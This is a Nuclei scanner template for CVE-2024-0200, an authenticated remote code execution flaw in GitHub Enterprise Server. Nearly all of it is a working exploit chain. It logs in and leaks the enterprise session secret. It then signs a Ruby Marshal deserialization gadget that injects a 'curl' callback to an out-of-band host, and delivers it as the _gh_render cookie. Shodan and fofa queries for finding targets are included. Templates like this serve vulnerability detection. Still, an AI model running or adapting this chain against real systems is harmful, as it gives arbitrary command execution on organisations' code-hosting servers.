id : CVE-2024-0200
info :
name : Github Enterprise Authenticated Remote Code Execution
author : iamnoooob,rootxharsh,pdresearch
severity : critical
description : |
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
reference :
- https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
- https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
- https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5
- https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3
- https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-0200
cwe-id : CWE-470
epss-score : 0.0037
epss-percentile : 0.72517
cpe : cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
metadata :
vendor : github
product : enterprise_server
shodan-query : title:"GitHub Enterprise"
fofa-query : app="Github-Enterprise"
verified : true
tags : cve,cve2024,rce,github,enterprise
variables :
username : "{{username}}"
password : "{{password}}"
oast : "curl {{interactsh-url}}/?"
padstr : "{{randstr}}"
payload : '{{padding(oast,padstr,300)}}'
marshal_data : '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
b64_marshal_data : "{{base64(url_decode(marshal_data))}}"
digest : "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
final_payoad : "{{ b64_marshal_data + '--' + digest}}"
http :
- method : GET
path :
- "{{BaseURL}}/api/v3/user/orgs"
headers :
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
extractors :
- type : json
part : body
name : org_name
internal : true
json :
- ".[].login"
- method : GET
path :
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
headers :
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
matchers-condition : and
matchers :
- type : word
words :
- '"role": "admin"'
part : body
- method : POST
path :
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
headers :
Content-Type : application/json
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
body : |
{
"name": "{{randstr}}"
}
matchers :
- type : status
status :
- 201
- method : GET
cookie-reuse : true
path :
- "{{BaseURL}}/login"
extractors :
- type : regex
part : body
internal : true
group : 1
regex :
- 'name="authenticity_token" value="(.*?)"'
name : csrf_token
- method : POST
path :
- "{{BaseURL}}/session"
headers :
Content-Type : application/x-www-form-urlencoded
body : |
login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
matchers :
- type : status
status :
- 302
- type : word
words :
- "_gh_render"
part : header
- method : GET
path :
- "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
extractors :
- type : regex
group : 1
name : ghe_secret
internal : true
regex :
- '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"'
part : body
matchers :
- type : word
words :
- 'ENTERPRISE_SESSION_SECRET'
part : body
- method : GET
path :
- "{{BaseURL}}/"
headers :
Cookie : _gh_render={{final_payoad}}
matchers-condition : and
matchers :
- type : status
status :
- 500
- type : word
part : interactsh_protocol
words :
- "dns"
# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950